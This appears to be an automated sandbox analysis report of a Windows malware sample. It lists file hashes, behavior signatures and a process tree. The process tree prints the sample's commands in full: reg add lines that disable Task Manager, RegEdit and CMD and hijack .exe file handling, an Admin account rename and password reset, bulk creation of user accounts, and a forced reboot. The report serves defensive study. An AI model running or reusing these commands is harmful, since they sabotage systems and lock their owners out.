Analysis
- max time kernel: 4s
- max time network: 5s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 18-10-2024 02:33
Static task: static1
Behavioral task: behavioral1
- Sample: b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
- Resource: win7-20241010-en
Behavioral task: behavioral2
- Sample: b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
- Resource: win10v2004-20241007-en
Errors
General
- Target: b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
- Size: 955KB
- MD5: bde1d37ad1cf05320955681bf6455efa
- SHA1: 52feb8bc6c21770eea00d19b1c228ee707228da7
- SHA256: b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f
- SHA512: 17d9f2c319aa082d5fdf97ba7bc49505c1f768bf217383b220204cf7b4511d0c227408200e40a943c1e5228a1199f7ef218d5fdfd66d394547a6efb4a72e1e15
- SSDEEP: 24576:kuDXTIGaPhEYzUzA0SH6xrfNZh0WewxWr:DDjlabwz9nxJZ+wxc
Malware Config
Signatures
- Disables RegEdit via registry modification (1 IoC)
  Processes: reg.exe
  description | ioc
  Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"
- Disables Task Manager via registry modification
- Event Triggered Execution: Image File Execution Options Injection (1 TTP, 2 IoCs)
  Processes: reg.exe
  description | ioc
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "NUL"
- Drops file in System32 directory (28 IoCs)
  Processes: b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
  description | ioc
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\__tmp_rar_sfx_access_check_259416886
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png
  File created | C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs
  File opened for modification | C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: reg.exe
  description | ioc
  Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\img000.png"
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Accessibility Features (1 TTP)
  Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
- Modifies registry class (7 IoCs)
  Processes: cmd.exe
  description | ioc
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command\ = "wscript.exe \"C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\aplicaciones.vbs\" \"\" "
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "VBSExeHandler"
- Runs net.exe
- Suspicious use of AdjustPrivilegeToken (42 IoCs)
  Processes: WMIC.exe, shutdown.exe
  description | pid | process
  Token: SeIncreaseQuotaPrivilege | 2624 | WMIC.exe
  Token: SeSecurityPrivilege | 2624 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 2624 | WMIC.exe
  Token: SeLoadDriverPrivilege | 2624 | WMIC.exe
  Token: SeSystemProfilePrivilege | 2624 | WMIC.exe
  Token: SeSystemtimePrivilege | 2624 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 2624 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 2624 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 2624 | WMIC.exe
  Token: SeBackupPrivilege | 2624 | WMIC.exe
  Token: SeRestorePrivilege | 2624 | WMIC.exe
  Token: SeShutdownPrivilege | 2624 | WMIC.exe
  Token: SeDebugPrivilege | 2624 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 2624 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 2624 | WMIC.exe
  Token: SeUndockPrivilege | 2624 | WMIC.exe
  Token: SeManageVolumePrivilege | 2624 | WMIC.exe
  Token: 33 | 2624 | WMIC.exe
  Token: 34 | 2624 | WMIC.exe
  Token: 35 | 2624 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege | 2624 | WMIC.exe
  Token: SeSecurityPrivilege | 2624 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 2624 | WMIC.exe
  Token: SeLoadDriverPrivilege | 2624 | WMIC.exe
  Token: SeSystemProfilePrivilege | 2624 | WMIC.exe
  Token: SeSystemtimePrivilege | 2624 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 2624 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 2624 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 2624 | WMIC.exe
  Token: SeBackupPrivilege | 2624 | WMIC.exe
  Token: SeRestorePrivilege | 2624 | WMIC.exe
  Token: SeShutdownPrivilege | 2624 | WMIC.exe
  Token: SeDebugPrivilege | 2624 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 2624 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 2624 | WMIC.exe
  Token: SeUndockPrivilege | 2624 | WMIC.exe
  Token: SeManageVolumePrivilege | 2624 | WMIC.exe
  Token: 33 | 2624 | WMIC.exe
  Token: 34 | 2624 | WMIC.exe
  Token: 35 | 2624 | WMIC.exe
  Token: SeShutdownPrivilege | 2588 | shutdown.exe
  Token: SeRemoteShutdownPrivilege | 2588 | shutdown.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe, WScript.exe, cmd.exe, net.exe, net.exe
  description | pid | process | target process
  PID 2828 wrote to memory of 2740 | 2828 | b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe | WScript.exe
  PID 2828 wrote to memory of 2740 | 2828 | b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe | WScript.exe
  PID 2828 wrote to memory of 2740 | 2828 | b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe | WScript.exe
  PID 2740 wrote to memory of 2304 | 2740 | WScript.exe | cmd.exe
  PID 2740 wrote to memory of 2304 | 2740 | WScript.exe | cmd.exe
  PID 2740 wrote to memory of 2304 | 2740 | WScript.exe | cmd.exe
  PID 2304 wrote to memory of 1948 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1948 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1948 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 536 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 536 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 536 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 484 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 484 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 484 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1152 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1152 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1152 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1012 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1012 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1012 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 632 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 632 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 632 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2908 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2908 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2908 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 3016 | 2304 | cmd.exe | rundll32.exe
  PID 2304 wrote to memory of 3016 | 2304 | cmd.exe | rundll32.exe
  PID 2304 wrote to memory of 3016 | 2304 | cmd.exe | rundll32.exe
  PID 2304 wrote to memory of 580 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 580 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 580 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1844 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1844 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 1844 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 828 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 828 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 828 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2436 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2436 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2436 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2640 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2640 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2640 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2772 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2772 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2772 | 2304 | cmd.exe | reg.exe
  PID 2304 wrote to memory of 2624 | 2304 | cmd.exe | WMIC.exe
  PID 2304 wrote to memory of 2624 | 2304 | cmd.exe | WMIC.exe
  PID 2304 wrote to memory of 2624 | 2304 | cmd.exe | WMIC.exe
  PID 2304 wrote to memory of 1608 | 2304 | cmd.exe | net.exe
  PID 2304 wrote to memory of 1608 | 2304 | cmd.exe | net.exe
  PID 2304 wrote to memory of 1608 | 2304 | cmd.exe | net.exe
  PID 1608 wrote to memory of 3068 | 1608 | net.exe | net1.exe
  PID 1608 wrote to memory of 3068 | 1608 | net.exe | net1.exe
  PID 1608 wrote to memory of 3068 | 1608 | net.exe | net1.exe
  PID 2304 wrote to memory of 1228 | 2304 | cmd.exe | net.exe
  PID 2304 wrote to memory of 1228 | 2304 | cmd.exe | net.exe
  PID 2304 wrote to memory of 1228 | 2304 | cmd.exe | net.exe
  PID 1228 wrote to memory of 2552 | 1228 | net.exe | net1.exe
  PID 1228 wrote to memory of 2552 | 1228 | net.exe | net1.exe
  PID 1228 wrote to memory of 2552 | 1228 | net.exe | net1.exe
  PID 2304 wrote to memory of 2548 | 2304 | cmd.exe | net.exe
Processes
(process tree; the bracketed number is the depth in the tree, followed by the image path, PID, command line and triggered signatures)

[1] C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe (PID 2828)
    "C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WScript.exe (PID 2740)
      "C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\cmd.exe (PID 2304)
        cmd /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "
        - Modifies registry class
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe (PID 1948)
          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 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 /f
      [4] C:\Windows\system32\reg.exe (PID 536)
          reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
      [4] C:\Windows\system32\reg.exe (PID 484)
          reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
      [4] C:\Windows\system32\reg.exe (PID 1152)
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
      [4] C:\Windows\system32\reg.exe (PID 1012)
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f
      [4] C:\Windows\system32\reg.exe (PID 632)
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f
          - Event Triggered Execution: Image File Execution Options Injection
      [4] C:\Windows\system32\reg.exe (PID 2908)
          reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f
          - Sets desktop wallpaper using registry
      [4] C:\Windows\system32\rundll32.exe (PID 3016)
          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      [4] C:\Windows\system32\reg.exe (PID 580)
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f
      [4] C:\Windows\system32\reg.exe (PID 1844)
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
      [4] C:\Windows\system32\reg.exe (PID 828)
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f
      [4] C:\Windows\system32\reg.exe (PID 2436)
          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
      [4] C:\Windows\system32\reg.exe (PID 2640)
          reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
      [4] C:\Windows\system32\reg.exe (PID 2772)
          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
          - Disables RegEdit via registry modification
      [4] C:\Windows\System32\Wbem\WMIC.exe (PID 2624)
          wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\net.exe (PID 1608)
          net user "YOU ARE THE NEXT" "im dead"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net1.exe (PID 3068)
            C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"
      [4] C:\Windows\system32\net.exe (PID 1228)
          net user T3yZrQ Maxcheto /add
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net1.exe (PID 2552)
            C:\Windows\system32\net1 user T3yZrQ Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2548)
          net user 8rJpX1 Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 1824)
            C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2360)
          net user 9MaL2Z Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 1900)
            C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 1040)
          net user K4$dF27 Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 1304)
            C:\Windows\system32\net1 user K4$dF27 Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2492)
          net user xC78RT Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 2096)
            C:\Windows\system32\net1 user xC78RT Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2148)
          net user 3nL9$p2x Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 2432)
            C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2232)
          net user X7hbQ5Z Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 2204)
            C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2164)
          net user R2xD1B Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 2060)
            C:\Windows\system32\net1 user R2xD1B Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2292)
          net user m14T8z Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 2300)
            C:\Windows\system32\net1 user m14T8z Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2384)
          net user L27w8G Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 1468)
            C:\Windows\system32\net1 user L27w8G Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 1292)
          net user P9dR2Y Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 2212)
            C:\Windows\system32\net1 user P9dR2Y Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2468)
          net user 5QL71t Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 552)
            C:\Windows\system32\net1 user 5QL71t Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 1848)
          net user r8B6V3F Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 2132)
            C:\Windows\system32\net1 user r8B6V3F Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2472)
          net user 7CXz1b Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 1068)
            C:\Windows\system32\net1 user 7CXz1b Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 1484)
          net user n38vJQ Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 1796)
            C:\Windows\system32\net1 user n38vJQ Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 1332)
          net user x6G7P1L Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 1588)
            C:\Windows\system32\net1 user x6G7P1L Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2320)
          net user M239Wk Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 1804)
            C:\Windows\system32\net1 user M239Wk Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 1344)
          net user 7F2hY4Z Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 1508)
            C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 1992)
          net user 8QrB1L7 Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 1076)
            C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 892)
          net user t93V6D Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 748)
            C:\Windows\system32\net1 user t93V6D Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 1128)
          net user 5tG2Q8J Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 2600)
            C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2000)
          net user x9K1P7L Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 2620)
            C:\Windows\system32\net1 user x9K1P7L Maxcheto /add
      [4] C:\Windows\system32\net.exe (PID 2352)
          net user z7R4M3 Maxcheto /add
        [5] C:\Windows\system32\net1.exe (PID 2580)
            C:\Windows\system32\net1 user z7R4M3 Maxcheto /add
      [4] C:\Windows\system32\shutdown.exe (PID 2588)
          shutdown /r /f /t 0
          - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\LogonUI.exe (PID 1576)
    "LogonUI.exe" /flags:0x0
[1] C:\Windows\system32\LogonUI.exe (PID 2932)
    "LogonUI.exe" /flags:0x1
Network
MITRE ATT&CK Enterprise v15
Downloads